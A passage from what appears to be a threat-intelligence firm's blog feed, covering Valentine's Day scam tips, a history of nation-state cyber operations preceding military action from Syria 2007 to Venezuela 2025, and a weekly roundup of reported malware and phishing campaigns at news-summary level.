Similar to fake websites, hackers use a variety of tactics to deceive individuals into purchasing counterfeit tickets. Scammers exploit the high demand and limited supply of live events by creating fake ticketing websites with legitimate-sounding names, advertising fraudulent tickets on social media marketplaces, and even offering “last-minute deals” outside event venues. These scams are often tied to genuine events taking place in the area, making them appear more credible and increasing the probability that unsuspecting buyers will be fooled.

The likelihood of falling for these scams rises when purchases are delayed until the last minute. Scammers are aware that urgency and stress can cloud judgment, making individuals more vulnerable during rushed situations.

How to Protect Yourself:

• Purchase tickets from official sources.
• Verify the legitimacy of the event prior to purchase.
• Avoid purchases that require uncommon payment types.

Phishing Scams

In 2023, Checkpoint researchers claimed 1 in every 1,000 Valentine’s Day emails were found to be malicious/suspicious. Cybercriminals are skilled at creating enticing emails, messages, or social media posts that appear to come from a secret admirer or a long-lost love interest. These messages often feature subject lines such as “A Valentine’s Day Surprise for You” or “Someone Has a Crush on You.” Their purpose is to entice unsuspecting recipients into clicking malicious links or downloading infected attachments.

These scams can also include fake e-card messages and online shopping deals. Be aware of email ads promoting flowers, chocolates, and romantic getaways. The emails typically contain links to malicious sites that steal personal information and can infect your device with malware.

How To Protect Yourself:

• Ensure the sender has a trusted email address, showing the correct domain.
• Trust your instincts if the message seems “off” and possibly written by AI.
• Use trusted websites for all online shopping and double check website URLs for any odd variations.

Conclusion

Cybercriminals demonstrate a strong capacity to exploit emotions, while scam tactics continue to evolve in sophistication. Research shows that new domains with ‘Love’ or ‘Valentine’ in their names more than double in January compared to the year-end months. Excluding consumer losses, romance scams have accounted for hundreds of millions of dollars in losses each year, with the total increasing annually.

While Valentine’s Day celebrates love, cybercriminals unfortunately see it as an opportunity to exploit unsuspecting victims. As always, it’s important to remain vigilant during any online activity, especially when shopping for the perfect gift or planning a romantic experience.

---

To see specific examples and screenshots from the dark web, check out our blog from last year.

February 10, 2026

Warfare has always gone hand and hand with technological innovation. Nuclear energy followed the nuclear bomb nearly a decade after the first atomic weapon was detonated. Before the World Wide Web, there was ARPANET, launched in 1969 by the U.S. Department of Defense to connect military and research installations through distributed computer networks, more than 20 years before the internet became public. Before commercial GPS, there was NAVSTAR, a U.S. military satellite program developed in the 1970s, originally designed for missile guidance, troop movements, and precision targeting—years before civilian GPS became available. Military jet engines preceded commercial aviation, military radar predated modern weather forecasting, military encryption existed long before public cryptography and e-commerce, and drones, satellites, and even mass-produced antibiotics were first developed to meet battlefield demands.

Once again, militaries are leveraging technology to redefine tactics and battlefield strategies. Nation-states are increasingly developing offensive cyber capabilities not merely as tools, but as a means to prepare and shape the battlespace before military action occurs. Power grids, communications infrastructure, air defenses, satellites, psychological, and command-and-control systems are now targeted before the first kinetic shots in anger.

In this blog, we’ll review some of the most impactful nation-state offensive cyber operations in the modern era and how they illustrate this escalating trend of warfare.

Operation Orchard – September 6, 2007

Eleven years after Operation Orchard, Isreal admitted it was responsible for an airstrike in Syria that targeted a suspected nuclear reactor which may have been capable of enriching nuclear weapons material. No jets were shot down during the operation and no surface to air defense missiles were deployed from the Syrian military. In other words, Israel entered Syrian airspace without resistance.

According to multiple sources, the failure of Syrian air defenses during the 2007 strike has been attributed to a proactive Israeli cyber and electronic warfare operation that temporarily disabled radar and surface-to-air missile systems. Although specific methods were never publicly disclosed, analysts have speculated that the operation may have involved advanced electronic jamming and a software capability known as Suter.

Suter, reportedly deployed aboard specialized aircraft, is believed to exploit radar and air-defense systems by detecting their emissions and injecting malicious signals back into the emitters. This can result in disrupted sensor feeds, conflicting or false target data, and, in some cases, complete loss of radar functionality, effectively rendering the air-defense network inoperable during the operation.

Russian Invasion of Georgia – August 8, 2008

One day before Russian military units entered Georgia in 2008, there were widespread cyberattacks targeting local media as well as governments websites. These attacks were primarily distributed denial of service (DDOS) and website defacements. Although less sophisticated than other types of nation state cyber operations, these attacks aimed to isolate and silence both Georgian officials, and the civilian population.

With government services offline, it became difficult for state officials to communicate and respond to the events that would take place the following day. And when local media was unable to broadcast, they too could not communicate to the public the impact of Russians invasion into their homeland. This strategic DDOS attack caused confusion and made disinformation more potent as Russia continue to take control of Georgian territory.

The next phase of the cyber operation broadened the scope and targeted financial services, institutions, and even launched anti-Georgian hacktivist websites to stir discontent and make civilian resistance to the Russian operation less attractive.

Russia – Ukraine – 2014

There is ongoing debate among experts regarding the strategic significance of cyber operations during Russia’s 2014 annexation of Crimea. While offensive cyber activity was present during and intensified after the invasion, it is difficult to argue that these operations played a decisive role in enabling Russia’s territorial gains or directly shaping battlefield outcomes for Russian forces on the ground.

More impactful cyber operations emerged after the annexation. The Sandworm campaign stands out as one of the most consequential post-Crimea cyber efforts, causing extensive disruption to Ukrainian networks and, in later operations, contributing to widespread power outages. Other destructive campaigns, including wiper-style malware such as NotPetya, similarly targeted Ukrainian institutions and critical infrastructure in the years following 2014, reinforcing cyber operations as a persistent element of Russia’s broader pressure campaign rather than a decisive pre-invasion enabler.

Russia invasion of Ukraine – 2022

By February 2022, it had become clear that Russian military strategists believed their prior cyber operations were worth leveraging again in the lead-up to a full-scale invasion of Ukraine. Many of the same cyber tactics observed in previous years were redeployed days—or even hours—before Russian troops crossed the Ukrainian border.

In the days preceding the invasion, WhisperGate targeted Ukrainian government websites and servers. Disguised as traditional ransomware, WhisperGate was in fact wiper malware designed to destroy data and render systems inoperable. Shortly thereafter, coordinated DDoS attacks disrupted Ukrainian banks and temporarily took multiple government websites offline.

Just hours before the ground invasion commenced, a synchronized campaign deploying HermeticWiper and IsaacWiper further targeted Ukrainian government networks with wiper malware. These attacks appeared aimed at degrading communications, slowing coordination, and complicating defensive responses.

As wiper malware was overwriting disks across Ukraine, a separate cyberattack targeted satellite communications infrastructure. Ukraine’s ViaSatKA-SAT system was taken down, disrupting satellite connectivity used by civilian networks as well as certain Ukrainian military assets. This attack demonstrated a deliberate effort to impair command, control, and situational awareness at the critical opening phase of the invasion.

United States – Venezuela – 2025

The recent operation in Caracas demonstrates the capabilities that emerge when cyber warfare is integrated with real-world troops in combat. Although few details, means, or methods have been made public, there is still a significant amount of evidence highlighting the impact the United States Cyber Command made during Operation Absolute Resolve.

According to American officials, cyberweapons were used in Venezuela to disable power in regions near military bases in Caracas, as well as to shut down radar defense systems and even handheld radios used by the Venezuelan military (see image below). Unverified reports from soldiers and security personnel in Caracas claim to have experienced “intense sound waves, severe physical distress, and bleeding during the operation”. United States President Trump spoke to NewsNation after the operation and stated that a “sonic weapon” had been used during the raid.

Final Summary – The Cyber Battlespace Comes First

Modern warfare is no longer defined solely by armies, aircraft, and armor. As history has repeatedly shown, military necessity drives technological innovation, often before those capabilities reach the civilian world. Today, offensive cyber operations represent the latest evolution of this pattern—an invisible means of shaping conflict before the first kinetic action occurs.

The cases examined in this blog demonstrate a clear trend: nation-states now treat cyberspace as a domain of warfare. From Israel’s alleged disabling of Syrian air defenses during Operation Orchard, to Russia’s coordinated cyber disruptions preceding invasions of Georgia and Ukraine, cyber operations are used to blind sensors, sever communications, disrupt civilian infrastructure, and undermine public trust. These actions are not isolated technical events; they are strategically timed efforts designed to degrade an adversary’s ability to detect, decide, and respond under pressure.

---

Keep up with us. Follow DarkOwl on LinkedIn.

February 02, 2026

Our analyst team shares a few articles each week in our email newsletter which goes every Thursday. Make sure to register! This blog highlights those articles in order of what was the most popular in our newsletter – what our readers found the most intriguing. Stay tuned for a recap every month. We hope sharing these resources and news articles emphasizes the importance of cybersecurity and sheds light on the latest in threat intelligence.

1. ‘Bad actor’ hijacks Apex Legends characters in live matches – BleepingComputer

Over the weekend of January 09, players in Apex Legends, a battle royale shooter game, reported game disruptions caused by threat actors hijacking characters, disconnecting users, and changing nicknames. Respawn, the publisher of the game, confirmed the security incident claiming “bad actor is able to control the inputs of another player remotely in Apex Legends”. The company does not believe threat actors were able to exploit or infect malware, nor execute code. Read full article.

2. 27 Malicious npm Packages Used as Phishing Infrastructure to Steal Login Credentials – The Hacker News

On December 23, 2025 the Socket Threat Research Team announced the discovery of a 5 month long spear-phishing operation that turned 27 npm packages “into durable hosting for browser-run lures that mimic document-sharing portals and Microsoft sign-in”. The campaign targeted 25 organizations across the U.S. and Allied nations focusing on manufacturing, industrial automation, plastics, and healthcare. Specializing in focusing on sales and commercial personnel, the operation repurposed npm and package CDN’s “into durable hosting infrastructure, delivering client-side HTML and JavaScript lures that the threat actor embeds directly in phishing pages.” Following initial interaction, the script redirects the browser to threat-actor controlled infrastructure. Article here.

3. Hackers Use LinkedIn Messages to Spread RAT Malware Through DLL Sideloading – The Hacker News

ReliaQuest’s Threat Research team has discovered a new phishing campaign using private messages to deliver malicious payloads with the intent to deploy remote access trojan (RAT). The attack began with a message sent via LinkedIn that contained a “malicious WinRAR self-extracting archive”. Once opened, the archive extracts four components, mainly a PDF disguised with names that align with the victim’s industry. The final payload attempts to communicate with an external server that can grant persistent remote access. Read more here.

4. Silver Fox Targets Indian Users With Tax-Themed Emails Delivering ValleyRAT Malware – The Hacker News

Recent activity shows Chinese threat actor, Silver Fox, has begun using income tax themed lures to distribute ValleyRAT. The group has focused on Indian entities, using phishing emails containing decoy PDFs claiming to be from India’s Income Tax Department. Opening the attachment leads victims to download files that injects ValleyRAT into the system and communicates with external servers. Read here.

6. North Korea-Linked Hackers Target Developers via Malicious VS Code Projects – The Hacker News

The Contagious Interview campaign, which has been linked to North Korean threat actors, has been observed leveraging a version of Microsoft Visual Studio Code (VS Code) to deploy a backdoor on compromised systems. First discovered in December 2025, the attack involves instructing targets to clone a repository “on GitHub, GitLab, or Bitbucket, and launch the project in VS Code as part of a supposed job assessment.” The overall goal is for payload to run every time a file in the folder is opened, which eventually leads to deployment of malwares like, BeaverTail and InvisibleFerret. Read full article.

7. Hackers claim to hack Resecurity, firm says it was a honeypot – BleepingComputer

Scattered Lapsus$ Hunters (SLH) announced via Telegram that they had breached systems belonging to Resecurity and stole internal data. To prove their claims SLH posted screenshots of the data which revealed communications between employees and Pastebin personnel. Resecurity published a report in December 2025 disputing the claims and stated after identifying threat actor probing activity in November 2025, they deployed a “honeypot” account. The account was in an isolated environment that contained fake information and was being monitored. Read full article.

8. China-linked hackers exploited Sitecore zero-day for initial access – BleepingComputer

The China-linked threat actor UAT-8837 has been observed attempting to compromise North American infrastructure by exploiting both known and zero-day vulnerabilities. The attacks begin with leveraging compromised credentials or by exploiting server vulnerabilities. Recent attacks include zero-day flaw in Sitecore products, CVE-2025-53690. Researchers claim UAT-8837 uses “open-source and living-off-the-land utilities, continually cycling variants to evade detection.” Learn more.

---

Make sure to register for our weekly newsletter to get access to what our analysts are reading on a weekly basis.